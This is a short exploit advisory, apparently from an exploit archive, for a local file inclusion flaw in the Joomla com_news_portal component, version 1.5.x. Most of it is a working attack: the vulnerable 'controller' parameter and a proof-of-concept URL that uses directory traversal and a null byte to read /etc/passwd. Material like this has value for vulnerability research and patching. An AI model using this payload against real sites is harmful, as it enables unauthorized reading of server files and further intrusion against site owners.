id: 11657
date: 04/06/2010
title: Joomla Component News Portal com_news Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

========================================================================
Joomla Component News Portal com_news Local File Inclusion Vulnerability
========================================================================

=================================================================================================================
 
 
  [o] Joomla Component News Portal Local File Inclusion Vulnerability
  
       Software : com_news_portal version 1.5.x
       Vendor   : http://www.ijoomla.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_news_portal&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
 
 
=================================================================================================================



#  0day.today [2023-03-24]  #